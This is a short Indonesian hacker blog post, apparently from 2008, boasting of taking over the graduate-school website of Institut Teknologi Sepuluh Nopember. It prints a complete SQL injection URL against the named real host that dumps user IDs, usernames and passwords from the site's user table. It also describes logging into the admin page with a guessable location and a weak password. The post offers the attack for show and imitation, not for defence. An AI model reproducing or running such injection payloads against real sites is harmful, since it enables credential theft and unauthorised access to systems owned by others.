Takeover Website Pascasarjana ITS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, December 17th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Terdapat celah SQL Injection pada website Pascasarjana Institut Teknologi Sepuluh Nopember (ITS). Celah berbahaya ini memungkinkan Attacker untuk memperoleh akses terhadap halaman admin web Pascasarjana Institut Teknologi Sepuluh Nopember (ITS).

http://www.pasca.its.ac.id/view_beritadetail.php?edit=-48 union select 1,2,version(),user(),5,group_concat(userid,0x2d2d,username,0x2d2d,userpass),7,8,9 from data_user

{image: SQL Injection pada pasca.its.ac.id}

SQL Injection pada pasca.its.ac.id

Lokasi login untuk Adminnya mudah ditebak dan passwordnya ternyata cukup simple..

{image: Halaman Admin pasca.its.ac.id}

Halaman Admin pasca.its.ac.id


//E.O.F